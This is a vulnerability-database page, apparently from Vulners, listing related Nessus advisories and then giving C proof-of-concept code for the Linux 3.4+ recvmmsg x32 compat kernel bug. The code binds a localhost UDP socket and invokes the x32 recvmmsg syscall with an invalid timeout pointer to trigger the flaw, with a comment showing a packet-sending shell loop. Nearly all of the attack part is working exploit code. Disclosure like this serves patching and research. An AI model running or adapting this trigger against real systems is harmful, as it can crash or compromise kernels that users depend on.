Linux Kernel recvmmsg x32 compat PoC exploi
Reporter | Title | Published | Views | Family All 84 |
---|---|---|---|---|
Tenable Nessus | Slackware 14.1 : kernel (SSA:2014-050-03) | 20 Feb 201400:00 | – | nessus |
Tenable Nessus | Ubuntu 13.10 : linux vulnerability (USN-2096-1) | 31 Jan 201400:00 | – | nessus |
Tenable Nessus | Ubuntu 12.04 LTS : linux-lts-saucy vulnerability (USN-2095-1) | 31 Jan 201400:00 | – | nessus |
Tenable Nessus | Ubuntu 12.04 LTS : linux-lts-raring vulnerability (USN-2094-1) | 31 Jan 201400:00 | – | nessus |
Tenable Nessus | Mandriva Linux Security Advisory : kernel (MDVSA-2014:038) | 18 Feb 201400:00 | – | nessus |
Tenable Nessus | openSUSE Security Update : kernel (openSUSE-SU-2014:0205-1) | 13 Jun 201400:00 | – | nessus |
Tenable Nessus | Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2014-3034) | 20 May 201400:00 | – | nessus |
Tenable Nessus | SUSE SLES12 Security Update : kernel (SUSE-SU-2017:3210-1) (Dirty COW) | 5 Dec 201700:00 | – | nessus |
Tenable Nessus | openSUSE Security Update : kernel (openSUSE-SU-2014:0204-1) | 13 Jun 201400:00 | – | nessus |
Tenable Nessus | SUSE SLES12 Security Update : kernel (SUSE-SU-2017:3249-1) (Dirty COW) | 11 Dec 201700:00 | – | nessus |
/*
* PoC trigger for the linux 3.4+ recvmmsg x32 compat bug, based on the manpage
*
* https://code.google.com/p/chromium/issues/detail?id=338594
*
* $ while true; do echo $RANDOM > /dev/udp/127.0.0.1/1234; sleep 0.25; done
*/
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
int
main(void)
{
#define VLEN 10
#define BUFSIZE 200
#define TIMEOUT 1
int sockfd, retval, i;
struct sockaddr_in sa;
struct mmsghdr msgs[VLEN];
struct iovec iovecs[VLEN];
char bufs[VLEN][BUFSIZE+1];
struct timespec timeout;
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd == -1) {
perror("socket()");
exit(EXIT_FAILURE);
}
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(1234);
if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("bind()");
exit(EXIT_FAILURE);
}
memset(msgs, 0, sizeof(msgs));
for (i = 0; i < VLEN; i++) {
iovecs[i].iov_base = bufs[i];
iovecs[i].iov_len = BUFSIZE;
msgs[i].msg_hdr.msg_iov = &iovecs[i];
msgs[i].msg_hdr.msg_iovlen = 1;
}
timeout.tv_sec = TIMEOUT;
timeout.tv_nsec = 0;
// retval = recvmmsg(sockfd, msgs, VLEN, 0, &timeout);
// retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, &timeout);
retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)1ul);
if (retval == -1) {
perror("recvmmsg()");
exit(EXIT_FAILURE);
}
printf("%d messages received\n", retval);
for (i = 0; i < retval; i++) {
bufs[i][msgs[i].msg_len] = 0;
printf("%d %s", i+1, bufs[i]);
}
exit(EXIT_SUCCESS);
}
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo